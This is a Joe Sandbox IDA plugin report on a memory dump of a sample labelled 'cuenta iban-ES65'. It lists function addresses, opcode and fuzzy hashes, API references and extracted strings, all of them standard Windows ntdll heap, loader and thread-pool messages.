Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
API String ID: 0-2518169356
Opcode ID: e84ddf03fdbbe09f83a35060530725cc1487e6d9917f9af494c1ea32b32f0d09
Instruction ID: 26e15f15e43e842ba0168a4091a690ed195e274ddb0e8d46202ecc79eab63036
Opcode Fuzzy Hash: e84ddf03fdbbe09f83a35060530725cc1487e6d9917f9af494c1ea32b32f0d09
Instruction Fuzzy Hash: 0691B076D007299BCF21CFA8C881AAEB7B5FF48760F554569E810EB350E775D901CB90

Uniqueness

Uniqueness Score: -1.00%

Function 3780ACEB Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3780AEA9
RtlDebugPrintTimes.NTDLL ref: 3780B185

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 71475f037e1c5d7d427195cb4232f79fa600861e865fa422141bcac72fd207d7
Instruction ID: 6e192e3c69764043d00875609a88d09d50568c4c546c476b452c8dff8315486a
Opcode Fuzzy Hash: 71475f037e1c5d7d427195cb4232f79fa600861e865fa422141bcac72fd207d7
Instruction Fuzzy Hash: 74F10772E00615AFDB08CF68CCD06BDBBF6AF98250B59416ED866DB380D634EA45CF50

Uniqueness

Uniqueness Score: -1.00%

Function 37727662 Relevance: 6.3, Strings: 5, Instructions: 51COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 3778ADB2
, passed to %s, xrefs: 3778ADCF
Invalid heap signature for heap at %p, xrefs: 3778ADBE
HEAP[%wZ]: , xrefs: 3778ADA5
RtlFreeHeap, xrefs: 3778ADCE

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
API String ID: 0-3061284088
Opcode ID: 4947adeb7aab54e967fd220644bc9782d615df39ad49a7d631f2ec165ddb4ba2
Instruction ID: c1ea117029ad7bdbf4e8518f47207fc2794b9921cb675ecd86037a6a2374be1d
Opcode Fuzzy Hash: 4947adeb7aab54e967fd220644bc9782d615df39ad49a7d631f2ec165ddb4ba2
Instruction Fuzzy Hash: 54017036014240FFD3059328D84EFA27BE4FB81731F25489EE0549F5A0DB599850ED72

Uniqueness

Uniqueness Score: -1.00%

Function 37746FE0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 37747B9C, 3774859F
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 37747BB6, 377485B6
HEAP[%wZ]: , xrefs: 37747B8D, 37748590

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: f7612096e33615b84be2d67b7532f58e320b5061bda964f415b68dfb699ed909
Instruction ID: 4e798c6b10893978ac6c64a7c661c3f1322648624dda562ba463a6afe489a28d
Opcode Fuzzy Hash: f7612096e33615b84be2d67b7532f58e320b5061bda964f415b68dfb699ed909
Instruction Fuzzy Hash: E9139A74A00759CFEB15CF68C880BA9BBF2BF49314F1485ADD849AF381D734A981DB91

Uniqueness

Uniqueness Score: -1.00%

Function 37730485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 377305D6

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 37730586
kLsE, xrefs: 377305FE

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID: DebugPrintTimes
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 3446177414-2547482624
Opcode ID: 16390fc829e84f9b1d0c02722bada69be4791f80afd6113f77fa7711472e345f
Instruction ID: 97b8219d5864f13bc31fd71c8f4a272dc83092724accc66232151a6c9276c172
Opcode Fuzzy Hash: 16390fc829e84f9b1d0c02722bada69be4791f80afd6113f77fa7711472e345f
Instruction Fuzzy Hash: DA51BEB5B0274ADFF710DFA4C444BAAB7F6AF44310F00882ED5D58B242E774A505CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 3774A760 Relevance: 5.4, Strings: 4, Instructions: 358COMMON

Download Yara Rule

Strings

SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 37797B63
SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 37797B46
RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 37797B10
SsHd, xrefs: 3774A7A5

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
API String ID: 0-2905229100
Opcode ID: fed14afa5fc5242dce0dc33ec390b3605c5445ff83d6a69c8a7d003245acf64a
Instruction ID: 56faca247381d2fdb8075bb1c50497aa6787df55d6f3809df7d636f014288c3c
Opcode Fuzzy Hash: fed14afa5fc5242dce0dc33ec390b3605c5445ff83d6a69c8a7d003245acf64a
Instruction Fuzzy Hash: CCD1BC75A00209DFDB15CF98D8C1BEDB7B6FF59320F56446AE805AF241E731A841CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 37743C60 Relevance: 5.4, Strings: 3, Instructions: 1603COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 3774429C, 377444D4, 37744773
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 377442B3, 377444EB, 3774478D
HEAP[%wZ]: , xrefs: 3774428D, 377444C5, 37744764

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 9553731d76b9d14479dd6c14ad7c81dab78b54689cd0dc329e932ee2463b76af
Instruction ID: c824d9bb12470e57d195cb95f55c9251ac26be5d9dc7ee84c9bee08adc74bd42
Opcode Fuzzy Hash: 9553731d76b9d14479dd6c14ad7c81dab78b54689cd0dc329e932ee2463b76af
Instruction Fuzzy Hash: FCE2BE74A00265DFEB14CF68C880BA9BBF2FF49314F5485A9E849AF385D734A841DF91

Uniqueness

Uniqueness Score: -1.00%

Function 3773B5E0 Relevance: 5.3, Strings: 4, Instructions: 303COMMON

Download Yara Rule

Strings

LdrResGetRCConfig Exit, xrefs: 3773B634
LdrResGetRCConfig Enter, xrefs: 3773B622
MUI, xrefs: 3773B5F8
LUp7, xrefs: 3773B704, 3773B707

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: LUp7$LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
API String ID: 0-2854259097
Opcode ID: 313633044bc19aae30fc5b66eec9db213fff873f64317d02b561b9232ad7097a
Instruction ID: 277fda53f64f6c3fa85d158ea9beec17ea36d4b857674a78fe3dda108766c8fd
Opcode Fuzzy Hash: 313633044bc19aae30fc5b66eec9db213fff873f64317d02b561b9232ad7097a
Instruction Fuzzy Hash: 7DB1AE75A02704CBEB14CF69D894BADB7B2AF49758F114829E821EF3A2D734E840CF50

Uniqueness

Uniqueness Score: -1.00%

Function 3773A2E0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

LdrResFallbackLangList Enter, xrefs: 3773A30F
8, xrefs: 3773A307
6, xrefs: 3773A317
LdrResFallbackLangList Exit, xrefs: 3773A31F

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 01754c966683d1e6347d3b6d34c69d8a7ed4a0772c05ffe6b7f6fdea1d4d4ae7
Instruction ID: c41c10ad34d6f852f5c25d2579b7ed4e3a4f1083de59d01a430272376ec388e7
Opcode Fuzzy Hash: 01754c966683d1e6347d3b6d34c69d8a7ed4a0772c05ffe6b7f6fdea1d4d4ae7
Instruction Fuzzy Hash: 4FC1AC7420A382CFE711CF18C085BAAB3E5FF85754F01496AF8858F252EB38D945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 37768322 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

@, xrefs: 377684B1
LdrpInitializeProcess, xrefs: 37768342
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 3776847E
minkernel\ntdll\ldrinit.c, xrefs: 37768341

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: faf35080e6a5965630f1a005903a5ab8149b13b67975d09270000100c4711431
Instruction ID: 5c8e26ed927b8549da5ad0c08517b6bb2a9fe07b21d394da58ecf171f00d6ca5
Opcode Fuzzy Hash: faf35080e6a5965630f1a005903a5ab8149b13b67975d09270000100c4711431
Instruction Fuzzy Hash: 2D917F71508341AFE721CF20C848FABBBE8EF84798F44492EFA949A150E738D904DB53

Uniqueness

Uniqueness Score: -1.00%

Function 37740B10 Relevance: 5.3, Strings: 4, Instructions: 260COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 377952ED, 377953AE
((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 377952FA
HEAP[%wZ]: , xrefs: 377952DE, 3779539F
ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 377953BB

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
API String ID: 0-1657114761
Opcode ID: 6a69c8d8439e62692460dc6323cd3d15c61a972f0ed6c8b1d72b059d9bf09ec8
Instruction ID: 66004e949e7b5315bd226277b683e67f9da791cfbf6e7ffdfb00dce053a4889f
Opcode Fuzzy Hash: 6a69c8d8439e62692460dc6323cd3d15c61a972f0ed6c8b1d72b059d9bf09ec8
Instruction Fuzzy Hash: ABA10074A0074ADFE724CF24C894BBAB7E2FF45354F1089A9D4998F681E734E944CB92

Uniqueness

Uniqueness Score: -1.00%

Function 3776265C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 377A1FE3, 377A20BB
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 377A20C0
.Local, xrefs: 377627F8
SXS: %s() passed the empty activation context, xrefs: 377A1FE8

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: 8a769b4d8a0bbe2ac8be05da1c4a9e0d47abbee214cd16c46777dd9179e20985
Instruction ID: d9034c9d5c4d5b6322dfedde478616760c8dce5fff30961f5fe84101aad53cef
Opcode Fuzzy Hash: 8a769b4d8a0bbe2ac8be05da1c4a9e0d47abbee214cd16c46777dd9179e20985
Instruction Fuzzy Hash: D5A19F7590032A9BEB60CF54CC88B9AB3B2BF58758F1005F9D808AF255D734AE81CF91

Uniqueness

Uniqueness Score: -1.00%

Function 377C327E Relevance: 5.2, Strings: 4, Instructions: 236COMMON

Download Yara Rule

Strings

@, xrefs: 377C33F7
LdrpResMapFile Enter, xrefs: 377C32A5
X}q7, xrefs: 377C353A
LdrpResMapFile Exit, xrefs: 377C32B7

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit$X}q7
API String ID: 0-648746382
Opcode ID: 96108ff0dc3f4acbf3f0c32cfc651c78a7c9cff497b4cdfb1f841d7998e9f6bd
Instruction ID: 80bd187725f6f91b80045e61e807740cbe600af852c0516955c21fa7dca5074a
Opcode Fuzzy Hash: 96108ff0dc3f4acbf3f0c32cfc651c78a7c9cff497b4cdfb1f841d7998e9f6bd
Instruction Fuzzy Hash: 39816D75608342AFE711CB25C884B6ABBE9EF8D760F40492DF9949F290DB74E904CB53

Uniqueness

Uniqueness Score: -1.00%

Function 3773B360 Relevance: 5.2, Strings: 4, Instructions: 221COMMON

Download Yara Rule

Strings

LdrpResGetResourceDirectory Enter, xrefs: 3773B385
LUp7, xrefs: 3773B500
LdrpResGetResourceDirectory Exit, xrefs: 3773B397
{, xrefs: 377935BD

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: LUp7$LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
API String ID: 0-3298455979
Opcode ID: a2870da2578593307530b2297649188d82cf715e893acb79aef1a781fcd6ea24
Instruction ID: 05c524c4ae414860d06841e93d05df373626d22b4d47b5c7ef264262c0f45812
Opcode Fuzzy Hash: a2870da2578593307530b2297649188d82cf715e893acb79aef1a781fcd6ea24
Instruction Fuzzy Hash: D591BC75A06359CBEB11CF64D4447EDB7B1EF09364F14499AE800AF2A2D778AE80CF91

Uniqueness

Uniqueness Score: -1.00%

Function 377363CB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 37790DEC
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 37790EB5
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 37790E72
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 37790E2F

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: d157170d423b5d32168ac88a601809a889dff71d57506cc350b8dcaba85efaf1
Instruction ID: f48dcbcb3bb6e90eefd0737c45dc6b5f436d449179da66738300ad45c8decb86
Opcode Fuzzy Hash: d157170d423b5d32168ac88a601809a889dff71d57506cc350b8dcaba85efaf1
Instruction Fuzzy Hash: D471C5B19053459FEBA0DF14C889F977BA9AF457A4F400868F9488F247D734D688CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 3772F5C7 Relevance: 5.2, Strings: 4, Instructions: 188COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 3778E2DD
ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3778E2F2
HEAP[%wZ]: , xrefs: 3778E18D
`, xrefs: 3778E1B7

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
API String ID: 0-2586055223
Opcode ID: 785079837158b1e27ef83f0e1ea7caa30c35a356f083d12dbdcfd0f01380b391
Instruction ID: 318ca3a69f9e0eb268a753e0a34301ede193ce55bb605d32622b1878de03c093
Opcode Fuzzy Hash: 785079837158b1e27ef83f0e1ea7caa30c35a356f083d12dbdcfd0f01380b391
Instruction Fuzzy Hash: AA61D275214780EFE311CB64C849F27B7EAEF847A4F040899E9649F291DB78E801DB63

Uniqueness

Uniqueness Score: -1.00%

Function 377F70F1 Relevance: 4.7, APIs: 3, Instructions: 153timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 377F71CE
RtlDebugPrintTimes.NTDLL ref: 377F7220
RtlDebugPrintTimes.NTDLL ref: 377F7275

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 991f65012277c31299612653c816806fa5d6223b5ccd9f5568473e5704122799
Instruction ID: f9a63c43edeb0ac9ee34bc1f2b39570afc2396dfd1b1fda527868bc651147e40
Opcode Fuzzy Hash: 991f65012277c31299612653c816806fa5d6223b5ccd9f5568473e5704122799
Instruction Fuzzy Hash: 7451C471A002159BDB04CFA4C944BAEBBB6FF88355F80852DE915EB340DB75AD16CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 377FFF63 Relevance: 4.6, APIs: 3, Instructions: 86timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 377FFFA3
RtlDebugPrintTimes.NTDLL ref: 377FFFE7
RtlDebugPrintTimes.NTDLL ref: 37800039

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 05f6262bdf35ab62a70bfc86c7181bb72a106faef9dcdc7cbc0c79fd133641a8
Instruction ID: c5e626a2f0cd81878c69d9c4523e94d95e7f21bd881c3e67985aa6ea47ce92ca
Opcode Fuzzy Hash: 05f6262bdf35ab62a70bfc86c7181bb72a106faef9dcdc7cbc0c79fd133641a8
Instruction Fuzzy Hash: B9314171B00119AFDB04CFA5C898B9FBBB9FF88355F41412AE905E7200DB346E45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 37782E48 Relevance: 4.5, Strings: 3, Instructions: 762COMMON

Download Yara Rule

Strings

-x7, xrefs: 3778305B
@`>wBb>w, xrefs: 37782F2D, 37783304, 3778335B, 3778341E, 3778344E
-x7, xrefs: 3778352D, 3778328C, 37782F38, 37783536

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: @`>wBb>w$-x7$-x7
API String ID: 0-4212031377
Opcode ID: 6b2ce67507a0451809cd5d886d8130437296499fdca5981aea816391c4bdd740
Instruction ID: 7ec484d396c82dca1d9d631400d913df3b4ae75e54b11cbeefb20827ac528cb7
Opcode Fuzzy Hash: 6b2ce67507a0451809cd5d886d8130437296499fdca5981aea816391c4bdd740
Instruction Fuzzy Hash: 7842E7B9E04349BAEF04CFACC8467BDBBB2AF0C765F54891AD458AF280DB749641C750

Uniqueness

Uniqueness Score: -1.00%

Function 37741EB2 Relevance: 4.3, Strings: 3, Instructions: 563COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 3774204E, 37795C60, 37795E0E, 37795F58
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 3774208B, 37795C75, 37795E23, 37795F6D
HEAP[%wZ]: , xrefs: 37742075, 37795C53, 37795E01, 37795F4B

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 2b8eca76d487baa5584b1e19f5089b0fefb46a0c5a54c3cf84703fb051a29cfa
Instruction ID: 1c27282aa86589e2c9e942b566391b22a82ed9c67454474a71e874cd2a688d82
Opcode Fuzzy Hash: 2b8eca76d487baa5584b1e19f5089b0fefb46a0c5a54c3cf84703fb051a29cfa
Instruction Fuzzy Hash: 9D2200B46017569FE701CF24C484BBABBF6FF06794F1488A9E4548F281E735E882CB61

Uniqueness

Uniqueness Score: -1.00%

Function 377C3608 Relevance: 4.1, Strings: 3, Instructions: 398COMMON

Download Yara Rule

Strings

LdrpResSearchResourceHandle Exit, xrefs: 377C3681
PE, xrefs: 377C37D2
LdrpResSearchResourceHandle Enter, xrefs: 377C3666

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
API String ID: 0-1168191160
Opcode ID: 994c8b925d9de67089d1a32b78d8805980df3ffdd768c0512ee3195ad906f8d0
Instruction ID: ca3c1ba31c59acc999c55d84f3ccb98219011c2ff79319687ec829dd3dd76098
Opcode Fuzzy Hash: 994c8b925d9de67089d1a32b78d8805980df3ffdd768c0512ee3195ad906f8d0
Instruction Fuzzy Hash: A5F160B5A0032A8BDB20CF14CCC4BE9B3B6AF4D754F4444E9E509AB241EB359E85CF56

Uniqueness

Uniqueness Score: -1.00%

Function 37731380 Relevance: 4.1, Strings: 3, Instructions: 385COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 377314B6
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 37731648
HEAP[%wZ]: , xrefs: 37731632

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 93b9a982cc1c6e9cc8d6c977e19312104af40ae02e314ee2ed3052983884e900
Instruction ID: ec9b7d83a6556156afabb003a79677b0d2ea47dbc5e9c8334283ced6c0bad7f4
